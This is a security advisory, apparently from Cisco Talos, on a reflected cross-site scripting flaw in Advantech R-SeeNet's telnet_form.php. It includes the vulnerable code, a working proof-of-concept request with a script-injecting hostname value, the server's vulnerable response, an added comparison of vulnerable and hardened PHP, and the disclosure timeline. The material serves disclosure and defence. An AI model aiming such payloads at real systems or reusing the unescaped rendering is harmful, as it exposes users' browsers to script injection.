CVE-2021-21799: TALOS-2021-1270 || Cisco Talos Intelligence Group

Summary

Cross-site scripting vulnerabilities exist in the telnet_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger this vulnerability.

Tested Versions

Advantech R-SeeNet 2.4.12 (20.10.2020)

Product URLs

https://ep.advantech-bb.cz/products/software/r-seenet

CVSSv3 Score

9.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

Details

R-SeeNet is the software system used for monitoring Advantech routers. It continuously collects information from the individual routers in the network and stores the data in an SQL database.

This vulnerability is present in the telnet_form.php script, which is part of the Advantech R-SeeNet web application. A URL specially crafted by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.

The telnet_form.php script accepts a hostname parameter supplied by the user in an HTTP request:

php/telnet_form.php, lines 11-14:

    if(isset($_GET['hostname']) && ($_GET['hostname'] != ''))
    {  // hostname given
       $hostname = $_GET['hostname'];
    }

The parameter is not sanitized against XSS payloads and is embedded directly into the HTML output (php/telnet_form.php, line 44):

    <title>Telnet <?php echo($hostname)?></title>

Request

GET /php/telnet_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ctitle%3E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Date: Fri, 05 Mar 2021 16:51:07 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.5
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1402
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="description" content="TODO - info">
    <meta http-equiv="pragma" content="no-cache">
    <meta http-equiv="cache-control" content="no-cache">
    <title>Telnet </title><script>alert(1)</script><title></title>

The victim does not need to be logged in to be affected by this vulnerability.
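The following is an added example, not code from R-SeeNet or from Talos: it places the vulnerable title rendering shown above next to a hardened version, and feeds both the decoded value of the hostname parameter from the request above. The hostname validation policy (reject anything that is not a syntactic hostname) is an assumption made for this example.

```php
<?php
// Added example, not code from R-SeeNet: the vulnerable pattern shown in
// telnet_form.php next to a hardened version of the same title rendering.

// Vulnerable: the raw query parameter lands inside <title>. The <title>
// element is RCDATA, so the browser ends the title at the first "</title"
// and parses what follows as markup; a value of the form
// "</title><script>...</script><title>" therefore injects a script element.
function render_title_vulnerable($hostname)
{
    return "<title>Telnet " . $hostname . "</title>";
}

// Defence in depth (hypothetical policy for this example): only a
// syntactically valid hostname (RFC 1123 labels, at most 253 characters)
// may reach the template at all.
function is_valid_hostname($hostname)
{
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return strlen($hostname) <= 253
        && preg_match('/^' . $label . '(?:\.' . $label . ')*$/', $hostname) === 1;
}

// Hardened: HTML-encode the value for the element-content context. "<" becomes
// "&lt;", so the encoded value can never close the title element, regardless
// of whether the validation step above is kept.
function render_title_hardened($hostname)
{
    if (!is_valid_hostname($hostname)) {
        $hostname = '';
    }
    $safe = htmlspecialchars($hostname, ENT_QUOTES, 'UTF-8');
    return "<title>Telnet " . $safe . "</title>";
}

// Constructed input: the decoded value of the advisory's hostname parameter.
$payload = rawurldecode('%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ctitle%3E');

echo render_title_vulnerable($payload), PHP_EOL;             // script element escapes <title>
echo render_title_hardened($payload), PHP_EOL;               // rejected: nothing injected
echo render_title_hardened('router-01.example.net'), PHP_EOL; // legitimate name passes through
```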

Timeline

2021-03-11 - Initial contact with vendor
2021-03-14 - Advisory issued to CISA
2021-04-13 - Follow up with vendor & CISA
2021-06-07 - Follow up with vendor & CISA (no response)
2021-06-22 - Final 90 day notice issued
2021-07-15 - Public Disclosure
